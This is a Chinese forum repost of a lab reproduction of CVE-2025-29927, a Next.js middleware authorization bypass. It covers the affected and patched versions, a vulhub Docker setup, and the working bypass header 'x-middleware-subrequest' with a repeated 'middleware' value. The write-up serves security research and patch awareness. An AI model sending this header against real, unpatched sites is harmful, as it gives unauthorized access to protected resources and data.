CVE-2025-29927 Next.js 中间件权限绕过毛病复现

种地  论坛元老 | 2025-3-24 12:36:48 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 1047|帖子 1047|积分 3141

免责声明

本文所述毛病复现方法仅供安全研究及授权测试使用;任何个人/组织须在合法合规条件下实施,严禁用于非法目的。作者不对任何滥用行为及结果负责,如发现新毛病请及时联系厂商并遵照毛病披露规则。
毛病信息

Next.js 是一个基于 React 的流行 Web 应用框架,提供服务器端渲染、静态网站天生和集成路由体系等功能。包含众多功能,是深入研究复杂研究的完美游乐场。在信念、好奇心和韧性的推动下,我们出发去探索它鲜为人知的方面,寻找等候被发现的隐藏宝藏。
当使用中间件进行身份验证和授权时,Next.js 14.2.25 和 15.2.3 之前的版本存在授权绕过毛病。
该毛病答应攻击者通过操纵 x-middleware-subrequest 哀求头来绕过基于中间件的安全控制,从而可能获得对受保护资源和敏感数据的未授权访问。
补丁:

  • 对于 Next.js 15.x,此问题已在 15.2.3 中修复
  • 对于 Next.js 14.x,此问题已在 14.2.25 中修复
毛病复现

vulhub已有环境:vulhub/next.js/CVE-2025-29927/README.zh-cn.md at master · vulhub/vulhub (github.com)
启动环境:
  1. docker compose up -d
复制代码

访问虚拟机3000端口,可以看到环境搭建成功:http://your-ip:3000/login

访问根路径,显示必要登岸:

添加哀求头,使用权限绕过payload
  1. x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
复制代码
访问成功,权限绕过毛病复现成功

参考文章

Next.js 和破坏的中间件:授权工件 - zhero_web_security (zhero-web-sec.github.io)
vulhub/next.js/CVE-2025-29927/README.zh-cn.md at master · vulhub/vulhub (github.com)
CVE 2025 29927 Nextjs Auth Bypass - chestnut's blog (ch35tnut.com)
Next.js中间件授权绕过毛病终极指南:CVE-2025-29927深度解析与防护计谋 - 高效码农 (xugj520.cn)
Comparing v15.2.2...v15.2.3 · vercel/next.js (github.com)
代码审计知识星球 (zsxq.com)
本文作者CVE-柠檬i
CSDN:https://blog.csdn.net/weixin_49125123
博客园:https://www.cnblogs.com/CVE-Lemon
微信公众号:Lemon安全

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

种地

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表